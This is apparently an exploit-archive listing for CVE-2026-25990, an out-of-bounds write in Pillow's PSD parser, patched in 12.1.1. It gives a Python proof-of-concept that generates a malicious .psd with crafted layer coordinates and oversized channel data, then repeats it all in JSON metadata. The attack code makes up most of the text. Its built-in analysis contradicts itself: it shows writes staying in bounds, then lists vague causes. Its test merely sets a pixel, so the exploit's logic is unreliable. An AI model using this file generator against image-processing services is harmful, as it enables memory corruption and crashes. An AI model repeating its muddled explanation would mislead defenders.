📄 Pillow PSD Parser Out-Of-Bounds Write_PACKETSTORM:215855

9.3 / 10

CRITICAL

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/SC:N/VI:H/SI:N/VA:H/SA:N/E:P

Description

Proof of concept exploit that creates a malicious .psd file for Pillow that attempts an out-of-bounds write. This issue is patched in version 12.1.1...

Visit Original Source

Basic Information

ID PACKETSTORM:215855

Published Feb 19, 2026 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Pillow PSD Parser Potential Out-of-Bounds Write |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits) |
| # Vendor : https://pypi.org/project/pillow/ |
=============================================================================================================================================

[+] Summary : CVE-2026-25990 describes a potential Out-of-Bounds (OOB) Write vulnerability in the PSD parsing logic of Pillow.
The issue arises from improper validation of layer boundary coordinates (top, left, bottom, right) within crafted Photoshop (PSD) files.
By manipulating signed layer coordinates and creating inconsistencies between declared layer dimensions and actual channel image data sizes,
an attacker may trigger incorrect memory calculations during buffer allocation or pixel write operations.

[+] POC :

#!/usr/bin/env python3

import struct
import os

class OOBWriteExploit:
def __init__(self, output_file="oob_write.psd"):
self.output_file = output_file

def create_oob_write_psd(self):
"""
Creates a PSD file that triggers an Out-of-Bounds (OOB) Write
"""
psd_data = bytearray()
psd_data.extend(b'8BPS')
psd_data.extend(struct.pack('>H', 1))
psd_data.extend(b'\x00' * 6)
psd_data.extend(struct.pack('>H', 4))
psd_data.extend(struct.pack('>I', 1000))
psd_data.extend(struct.pack('>I', 1000))
psd_data.extend(struct.pack('>H', 8))
psd_data.extend(struct.pack('>H', 3))
psd_data.extend(struct.pack('>I', 0))
psd_data.extend(struct.pack('>I', 0))
layer_mask_start = len(psd_data)
psd_data.extend(struct.pack('>I', 0))
layer_info_start = len(psd_data)
psd_data.extend(struct.pack('>I', 0))
psd_data.extend(struct.pack('>h', 1))

top = -50
left = -50
bottom = 150
right = 150

psd_data.extend(struct.pack('>i', top))
psd_data.extend(struct.pack('>i', left))
psd_data.extend(struct.pack('>i', bottom))
psd_data.extend(struct.pack('>i', right))

num_channels = 4
psd_data.extend(struct.pack('>H', num_channels))

channel_positions = []
for i in range(num_channels):
if i < 3:
channel_id = i
else:
channel_id = -1

psd_data.extend(struct.pack('>h', channel_id))
channel_positions.append(len(psd_data))
psd_data.extend(struct.pack('>I', 0))

psd_data.extend(b'8BIM')
psd_data.extend(b'norm')
psd_data.extend(b'\xff')
psd_data.extend(b'\x00')
psd_data.extend(b'\x08')
psd_data.extend(b'\x00')
psd_data.extend(struct.pack('>I', 0))

if len(psd_data) % 2:
psd_data.extend(b'\x00')

for i, pos in enumerate(channel_positions):
compression = 0
psd_data.extend(struct.pack('>H', compression))

if i == 2:
channel_data = b'A' * 2000
else:
channel_data = b'\x80' * 1000

channel_full_data = struct.pack('>H', 0) + channel_data

psd_data[pos:pos+4] = struct.pack('>I', len(channel_full_data))

psd_data.extend(channel_full_data)

if len(psd_data) % 2:
psd_data.extend(b'\x00')

psd_data.extend(struct.pack('>I', 0))

layer_info_length = len(psd_data) - layer_info_start - 4
psd_data[layer_info_start:layer_info_start+4] = struct.pack('>I', layer_info_length)
layer_mask_length = len(psd_data) - layer_mask_start - 4
psd_data[layer_mask_start:layer_mask_start+4] = struct.pack('>I', layer_mask_length)
psd_data.extend(struct.pack('>H', 0))
psd_data.extend(b'\x00' * (1000 * 1000 * 4))

return psd_data

def analyze_oob_write(self):
"""
Analyzes how the OOB Write occurs
"""
print("\n Analysis of OOB Write Mechanism:")
print("=" * 50)

layer_width = 200
layer_height = 200
channels = 4
print("\n Calculations in Pillow:")
print(f"left = -50, top = -50")
print(f"right = 150, bottom = 150")
print(f"layer_width = right - left = {layer_width}")
print(f"layer_height = bottom - top = {layer_height}")
buffer_size = layer_width * layer_height * channels
print(f"\n Allocated buffer: {buffer_size:,} bytes ({layer_width}x{layer_height}x{channels})")
print("\n Writing Process:")
print("for y in range(layer_height):")
print(" for x in range(layer_width):")
print(" dest_pos = (y * layer_width + x) * channels")
print(" buffer[dest_pos:dest_pos+channels] = pixel_data")
print("\n The Logic:")
print("At x = 0, y = 0:")
print(" Required pixel is at (-50, -50) in the original image coordinates.")
print(" However, in the internal buffer, the position is (0, 0).")
print(" Writing will occur correctly at buffer[0].")
print("\nAt x = 199, y = 199:")
print(" Required pixel is at (149, 149) in original coordinates.")
print(" In the internal buffer, the index is (199, 199).")
print(" Writing occurs at buffer[199*200 + 199] = buffer[39,799].")
print(f" This is within buffer bounds (max = {buffer_size//channels - 1}) ✓")
print("\n **The Real Vulnerability**:")
print("An Out-of-Bounds write occurs when:")
print("1. There is a mismatch between the allocated buffer size and the actual data.")
print("2. Computed coordinates exceed buffer bounds due to integer overflow.")
print("3. Channel data provided is larger than the record headers claim.")
print("\nExample of OOB Write:")
print("buffer[dest_pos] = data_byte")
print("If dest_pos > len(buffer) → OOB Write")

def save_psd(self):
"""Saves the malicious file"""
malicious_data = self.create_oob_write_psd()

with open(self.output_file, 'wb') as f:
f.write(malicious_data)

print(f"\n[+] Created OOB Write file: {self.output_file}")
print(f"[+] File size: {len(malicious_data):,} bytes")

self.analyze_oob_write()

def test_oob_write(psd_file):
"""
Tests for OOB Write in Pillow
"""
try:
from PIL import Image
import array

print(f"\n Testing Pillow Version: {Image.__version__}")

img = Image.open(psd_file)
print(f"Image Dimensions: {img.size}")

pixels = img.load()

try:
# Trigger write attempt
pixels[1000, 1000] = (255, 0, 0)
print("Write successful (OOB might not have triggered)")
except Exception as e:
print(f"Error during pixel access: {e}")

except Exception as e:
print(f"Failed to open/load image: {e}")

if __name__ == "__main__":
exploit = OOBWriteExploit("oob_write_cve-2026-25990.psd")
exploit.save_psd()

print("\n[!] To test:")
print("python3 -c 'from PIL import Image; Image.open(\"oob_write_cve-2026-25990.psd\").load()'")

Greetings to :======================================================================
jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
====================================================================================

{
    "lastseen": "2026-02-19T16:35:20",
    "description": "Proof of concept exploit that creates a malicious .psd file for Pillow that attempts an out-of-bounds write. This issue is patched in version 12.1.1...",
    "published": "2026-02-19T00:00:00",
    "modified": "2026-02-19T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Pillow PSD Parser Out-Of-Bounds Write",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:215855",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2026-25990"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Pillow PSD Parser Potential Out-of-Bounds Write                                                                             |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits)                                                            |\n    | # Vendor    : https://pypi.org/project/pillow/                                                                                            |\n    =============================================================================================================================================\n    \n    [+] Summary    :  CVE-2026-25990 describes a potential Out-of-Bounds (OOB) Write vulnerability in the PSD parsing logic of Pillow. \n                      The issue arises from improper validation of layer boundary coordinates (top, left, bottom, right) within crafted Photoshop (PSD) files.\n                      By manipulating signed layer coordinates and creating inconsistencies between declared layer dimensions and actual channel image data sizes, \n    \t\t\t\t  an attacker may trigger incorrect memory calculations during buffer allocation or pixel write operations.\n    \n    \n    [+] POC :\n    \n    #!/usr/bin/env python3\n    \n    import struct\n    import os\n    \n    class OOBWriteExploit:\n        def __init__(self, output_file=\"oob_write.psd\"):\n            self.output_file = output_file\n            \n        def create_oob_write_psd(self):\n            \"\"\"\n            Creates a PSD file that triggers an Out-of-Bounds (OOB) Write\n            \"\"\"\n            psd_data = bytearray()\n            psd_data.extend(b'8BPS')          \n            psd_data.extend(struct.pack('>H', 1))  \n            psd_data.extend(b'\\x00' * 6)      \n            psd_data.extend(struct.pack('>H', 4))\n            psd_data.extend(struct.pack('>I', 1000)) \n            psd_data.extend(struct.pack('>I', 1000)) \n            psd_data.extend(struct.pack('>H', 8))    \n            psd_data.extend(struct.pack('>H', 3))    \n            psd_data.extend(struct.pack('>I', 0))\n            psd_data.extend(struct.pack('>I', 0))\n            layer_mask_start = len(psd_data)\n            psd_data.extend(struct.pack('>I', 0)) \n            layer_info_start = len(psd_data)\n            psd_data.extend(struct.pack('>I', 0)) \n            psd_data.extend(struct.pack('>h', 1)) \n    \n            top = -50     \n            left = -50   \n            bottom = 150   \n            right = 150   \n    \n            psd_data.extend(struct.pack('>i', top))\n            psd_data.extend(struct.pack('>i', left))\n            psd_data.extend(struct.pack('>i', bottom))\n            psd_data.extend(struct.pack('>i', right))\n    \n            num_channels = 4\n            psd_data.extend(struct.pack('>H', num_channels))\n    \n            channel_positions = []\n            for i in range(num_channels):\n                if i < 3:\n                    channel_id = i \n                else:\n                    channel_id = -1 \n                \n                psd_data.extend(struct.pack('>h', channel_id))\n                channel_positions.append(len(psd_data))\n                psd_data.extend(struct.pack('>I', 0)) \n    \n            psd_data.extend(b'8BIM')    \n            psd_data.extend(b'norm')     \n            psd_data.extend(b'\\xff')      \n            psd_data.extend(b'\\x00')      \n            psd_data.extend(b'\\x08')      \n            psd_data.extend(b'\\x00')     \n            psd_data.extend(struct.pack('>I', 0)) \n    \n            if len(psd_data) % 2:\n                psd_data.extend(b'\\x00')\n    \n            for i, pos in enumerate(channel_positions):\n                compression = 0  \n                psd_data.extend(struct.pack('>H', compression))\n    \n                if i == 2:  \n                    channel_data = b'A' * 2000  \n                else:\n                    channel_data = b'\\x80' * 1000\n    \n                channel_full_data = struct.pack('>H', 0) + channel_data\n    \n                psd_data[pos:pos+4] = struct.pack('>I', len(channel_full_data))\n    \n                psd_data.extend(channel_full_data)\n    \n                if len(psd_data) % 2:\n                    psd_data.extend(b'\\x00')\n    \n            psd_data.extend(struct.pack('>I', 0))\n    \n            layer_info_length = len(psd_data) - layer_info_start - 4\n            psd_data[layer_info_start:layer_info_start+4] = struct.pack('>I', layer_info_length)\n            layer_mask_length = len(psd_data) - layer_mask_start - 4\n            psd_data[layer_mask_start:layer_mask_start+4] = struct.pack('>I', layer_mask_length)\n            psd_data.extend(struct.pack('>H', 0)) \n            psd_data.extend(b'\\x00' * (1000 * 1000 * 4))\n            \n            return psd_data\n        \n        def analyze_oob_write(self):\n            \"\"\"\n            Analyzes how the OOB Write occurs\n            \"\"\"\n            print(\"\\n Analysis of OOB Write Mechanism:\")\n            print(\"=\" * 50)\n    \n            layer_width = 200\n            layer_height = 200\n            channels = 4\n            print(\"\\n Calculations in Pillow:\")\n            print(f\"left = -50, top = -50\")\n            print(f\"right = 150, bottom = 150\")\n            print(f\"layer_width = right - left = {layer_width}\")\n            print(f\"layer_height = bottom - top = {layer_height}\")\n            buffer_size = layer_width * layer_height * channels\n            print(f\"\\n Allocated buffer: {buffer_size:,} bytes ({layer_width}x{layer_height}x{channels})\")\n            print(\"\\n Writing Process:\")\n            print(\"for y in range(layer_height):\")\n            print(\"    for x in range(layer_width):\")\n            print(\"        dest_pos = (y * layer_width + x) * channels\")\n            print(\"        buffer[dest_pos:dest_pos+channels] = pixel_data\")\n            print(\"\\n The Logic:\")\n            print(\"At x = 0, y = 0:\")\n            print(\"  Required pixel is at (-50, -50) in the original image coordinates.\")\n            print(\"  However, in the internal buffer, the position is (0, 0).\")\n            print(\"  Writing will occur correctly at buffer[0].\")\n            print(\"\\nAt x = 199, y = 199:\")\n            print(\"  Required pixel is at (149, 149) in original coordinates.\")\n            print(\"  In the internal buffer, the index is (199, 199).\")\n            print(\"  Writing occurs at buffer[199*200 + 199] = buffer[39,799].\")\n            print(f\"  This is within buffer bounds (max = {buffer_size//channels - 1}) \u2713\")\n            print(\"\\n **The Real Vulnerability**:\")\n            print(\"An Out-of-Bounds write occurs when:\")\n            print(\"1. There is a mismatch between the allocated buffer size and the actual data.\")\n            print(\"2. Computed coordinates exceed buffer bounds due to integer overflow.\")\n            print(\"3. Channel data provided is larger than the record headers claim.\")\n            print(\"\\nExample of OOB Write:\")\n            print(\"buffer[dest_pos] = data_byte\")\n            print(\"If dest_pos > len(buffer) \u2192 OOB Write\")\n            \n        def save_psd(self):\n            \"\"\"Saves the malicious file\"\"\"\n            malicious_data = self.create_oob_write_psd()\n            \n            with open(self.output_file, 'wb') as f:\n                f.write(malicious_data)\n            \n            print(f\"\\n[+] Created OOB Write file: {self.output_file}\")\n            print(f\"[+] File size: {len(malicious_data):,} bytes\")\n    \n            self.analyze_oob_write()\n    \n    def test_oob_write(psd_file):\n        \"\"\"\n        Tests for OOB Write in Pillow\n        \"\"\"\n        try:\n            from PIL import Image\n            import array\n            \n            print(f\"\\n Testing Pillow Version: {Image.__version__}\")\n    \n            img = Image.open(psd_file)\n            print(f\"Image Dimensions: {img.size}\")\n    \n            pixels = img.load()\n    \n            try:\n                # Trigger write attempt\n                pixels[1000, 1000] = (255, 0, 0)\n                print(\"Write successful (OOB might not have triggered)\")\n            except Exception as e:\n                print(f\"Error during pixel access: {e}\")\n                \n        except Exception as e:\n            print(f\"Failed to open/load image: {e}\")\n    \n    if __name__ == \"__main__\":\n        exploit = OOBWriteExploit(\"oob_write_cve-2026-25990.psd\")\n        exploit.save_psd()\n        \n        print(\"\\n[!] To test:\")\n        print(\"python3 -c 'from PIL import Image; Image.open(\\\"oob_write_cve-2026-25990.psd\\\").load()'\")\n    \t\n    \t\n    Greetings to :======================================================================\n    jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|\n    ====================================================================================",
    "sourceHref": "https://packetstorm.news/download/215855",
    "cvss": {
        "score": 9.3,
        "severity": "CRITICAL",
        "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/SC:N/VI:H/SI:N/VA:H/SA:N/E:P",
        "version": "4.0"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/215855/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply